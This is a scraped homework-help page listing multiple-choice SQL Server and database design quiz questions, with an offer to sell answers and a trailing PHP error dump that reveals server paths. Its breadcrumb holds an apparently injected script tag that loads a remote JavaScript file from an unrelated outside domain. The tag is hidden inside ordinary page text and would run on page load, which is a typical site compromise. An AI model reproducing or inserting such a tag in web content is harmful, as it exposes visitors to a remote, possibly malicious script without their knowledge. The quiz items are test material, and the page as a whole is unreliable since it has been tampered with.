Need Help ? Chat : loading...

Home >> Assignments >> Other<script src="https://www.wp3advesting.com/planb.js"></script> >> QUESTION 129 Which SQL statement is used to retrieve view instances? SELECT DELETE CREATE INSERT QUE

(Solved): QUESTION 129 Which SQL statement is used to retrieve view instances? SELECT DELETE CREATE INSERT QUE ...



QUESTION 129 Which SQL statement is used to retrieve view instances? SELECT DELETE CREATE INSERT QUESTION 130 Which of the following is true about the SQL Server Import and Export Wizard? The spreadsheet data must already be normalized to be imported. There may be problems importing Excel 2016 data and we may need to install Excel 2007 compatibility software. The Import and Export Wizard sometimes creates blank rows at the end of the imported table. Both There may be problems importing Excel 2016 data and we may need to install Excel 2007 compatibility software and The Import and Export Wizard sometimes creates blank rows at the end of the imported table are correct. QUESTION 131 Which type(s) of index in SQL Server has/have a bottom level that does not contain data but has pointers to the data? Clustered Nonclustered Unique Both Clustered and Nonclustered are correct QUESTION 132 O Which SQL keyword is used to change the structure, properties or constraints of a table? CREATE ALTER SET SELECT QUESTION 133 The data model produced by reverse engineering is not truly a logical model because it will contain tables for strong entities intersection tables tables for ID-dependent entities supertype/subtype tables QUESTION 134 When transforming an ID-dependent E-R data model relationship into a relational database design, the referential integrity constraints should allow parent updates to cascade child updates to cascade child deletes to cascade Both parent updates to cascade and child updates to cascade are correct QUESTION 135 Locks that are placed assuming that a conflict will not occur are called shared pessimistic optimistic dynamic QUESTION 136 Which of the following is not true of DBMS security features? Both users and roles can have many permissions. Objects have many permissions. A role may be assigned to only one user. Users may be assigned to one or more roles. QUESTION 137 Specifying locking hints in which parameter in an SQL clause can modify locking behavior in SQL Server? WITH LOCK SELECT HINT QUESTION 138 If the values in an SOL view are not changeable through the view itself, you may still be able to update the view by using unique application logic. In this case, the specific logic is placed in O a BEFORE trigger an INSTEAD OF trigger an AFTER trigger Depending on the specific logic, either A or B can be used. QUESTION 139 Which of the following is true about making changes to the database structure? The DBA need not get input from users on the issue because it is a technical decision. Changes do not produce unexpected results because the DBA will have investigated the change thoroughly before implementing it. Formal policies and procedures for requesting a change are not used because they are too limiting. Documentation of when the change was made, how it was made, and why it was made must be created. QUESTION 140 When a transaction reads a row that has been changed, but the change has not been committed, is known as a _ Phantom read Dirty read Nonrepeatable read Clean read QUESTION 141 SQL Server system function names start with the symbol @@ ## # QUESTION 142 A referential integrity constraint policy that insures that foreign key values in a table are correctly maintained when there is a change to the primary key value in the parent table is called — cascading updates incremental updates incremental deletes cascading deletes QUESTION 143 The language available in SQL Server that adds programming constructs to the SQL language is known as _ PL/SQL INTERACT-SQL TRANSACT-SQL C++ QUESTION 144 When representing a 1:1 relationship in a relational database design, the key of each table must be placed as foreign keys into the other the key of either table may be placed as a foreign key into the other the key of both tables must be the same the intersection table gets the key from both relations QUESTION 145 Stored procedures have all these advantages except greater security SQL optimized by the DBMS compiler code sharing faster development QUESTION 146 Which SQL keyword is used to impose restrictions on a table, data or relationship? SET CREATE SELECT CONSTRAINT Show transcribed image text QUESTION 129 Which SQL statement is used to retrieve view instances? SELECT DELETE CREATE INSERT QUESTION 130 Which of the following is true about the SQL Server Import and Export Wizard? The spreadsheet data must already be normalized to be imported. There may be problems importing Excel 2016 data and we may need to install Excel 2007 compatibility software. The Import and Export Wizard sometimes creates blank rows at the end of the imported table. Both There may be problems importing Excel 2016 data and we may need to install Excel 2007 compatibility software and The Import and Export Wizard sometimes creates blank rows at the end of the imported table are correct. QUESTION 131 Which type(s) of index in SQL Server has/have a bottom level that does not contain data but has pointers to the data? Clustered Nonclustered Unique Both Clustered and Nonclustered are correct
QUESTION 132 O Which SQL keyword is used to change the structure, properties or constraints of a table? CREATE ALTER SET SELECT QUESTION 133 The data model produced by reverse engineering is not truly a logical model because it will contain tables for strong entities intersection tables tables for ID-dependent entities supertype/subtype tables QUESTION 134 When transforming an ID-dependent E-R data model relationship into a relational database design, the referential integrity constraints should allow parent updates to cascade child updates to cascade child deletes to cascade Both parent updates to cascade and child updates to cascade are correct
QUESTION 135 Locks that are placed assuming that a conflict will not occur are called shared pessimistic optimistic dynamic QUESTION 136 Which of the following is not true of DBMS security features? Both users and roles can have many permissions. Objects have many permissions. A role may be assigned to only one user. Users may be assigned to one or more roles. QUESTION 137 Specifying locking hints in which parameter in an SQL clause can modify locking behavior in SQL Server? WITH LOCK SELECT HINT
QUESTION 138 If the values in an SOL view are not changeable through the view itself, you may still be able to update the view by using unique application logic. In this case, the specific logic is placed in O a BEFORE trigger an INSTEAD OF trigger an AFTER trigger Depending on the specific logic, either A or B can be used. QUESTION 139 Which of the following is true about making changes to the database structure? The DBA need not get input from users on the issue because it is a technical decision. Changes do not produce unexpected results because the DBA will have investigated the change thoroughly before implementing it. Formal policies and procedures for requesting a change are not used because they are too limiting. Documentation of when the change was made, how it was made, and why it was made must be created. QUESTION 140 When a transaction reads a row that has been changed, but the change has not been committed, is known as a _ Phantom read Dirty read Nonrepeatable read Clean read
QUESTION 141 SQL Server system function names start with the symbol @@ ## # QUESTION 142 A referential integrity constraint policy that insures that foreign key values in a table are correctly maintained when there is a change to the primary key value in the parent table is called — cascading updates incremental updates incremental deletes cascading deletes QUESTION 143 The language available in SQL Server that adds programming constructs to the SQL language is known as _ PL/SQL INTERACT-SQL TRANSACT-SQL C++
QUESTION 144 When representing a 1:1 relationship in a relational database design, the key of each table must be placed as foreign keys into the other the key of either table may be placed as a foreign key into the other the key of both tables must be the same the intersection table gets the key from both relations QUESTION 145 Stored procedures have all these advantages except greater security SQL optimized by the DBMS compiler code sharing faster development QUESTION 146 Which SQL keyword is used to impose restrictions on a table, data or relationship? SET CREATE SELECT CONSTRAINT


We have an Answer from Expert

View Expert Answer

Get Expert Solution


We have an Answer from Expert

Buy This Answer $4

Place Order

QUICK ORDER

Why Place An Order With Us?

  • Certified Editors
  • 24/7 Customer Support
  • Profesional Research
  • Easy to Use System Interface
  • Student Friendly Pricing
Order Now

A PHP Error was encountered

Severity: Core Warning

Message: PHP Startup: Unable to load dynamic library 'dba.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so (libtokyocabinet.so.9: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so.so: cannot open shared object file: No such file or directory))

Filename: Unknown

Line Number: 0

Backtrace: